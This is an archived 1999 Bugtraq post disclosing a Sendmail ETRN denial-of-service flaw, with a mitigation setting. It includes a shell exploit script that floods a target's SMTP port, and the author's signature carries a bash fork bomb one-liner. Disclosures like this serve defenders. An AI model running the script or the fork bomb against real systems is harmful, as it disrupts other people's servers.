Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: procmail / Sendmail - five bugs
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Wed, 22 Dec 1999 22:22:12 +0100


On Tue, 21 Dec 1999, Rob Jones wrote:

with or without these double-quotes the message is immediately dropped
on redhat linux with the message

Oops! Yes, apparently this problem affects all versions of Sendmail, but
only with .cf file left from 8.8.x or previous releases. In fact, obsolete
.cf files are quite common if Sendmail has been updated by administrator -
'from hand' or from binary packages like .rpm - as people has not enough
time and good will to rebuild config files when replacing binary
(especially if there are some extensions/custom .cf settings).

So, another thing. There's nice remote Sendmail ETRN DoS. When ETRN
command is read by Sendmail (it shouldn't be allowed at all, IMHO), it
calls fork(). Parent process generates no output - only child-generated
output is sent, so parent won't be notified on send()/write() failure. If
we drop connection (after sending a lot of ETRNs), parent process will
stuck, doing repeately fork() ... sleep(5), till end of ETRNs read into
input buffer is reached. This allows us to spawn any amount of 'unusable'
sendmail childs, hanging for long period of time - and it can be done
using low network bandwitch and resources. Direct result - all server
memory consumed (causing Linux 2.0 kernels to crash with messages like 'no
memory for sendmail', 'no memory for klogd' etc). Unlike connect()
flooding, this attack is generating low traffic, only one connection at
time, and seems to be deadly harmful, unless something like:

# maximum number of children we allow at one time
O MaxDaemonChildren=15

is defined in sendmail.cf (as far I recall, this option is disabled by
default). The exploit follows (written for it's beautiful name):

-- gurghfrbl.sh --
#!/bin/sh

TARGET=localhost
COUNT=150
SLEEP=1

echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"

while:; do
  echo -n "."
  (
    NIC=0
    while [ "$NIC" -lt "$COUNT" ]; do
      echo "ETRN x"
    done
  ) | telnet $TARGET 25 &>/dev/null &
  sleep $SLEEP
  killall -9 telnet &>/dev/null
done
-- EOF --

_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault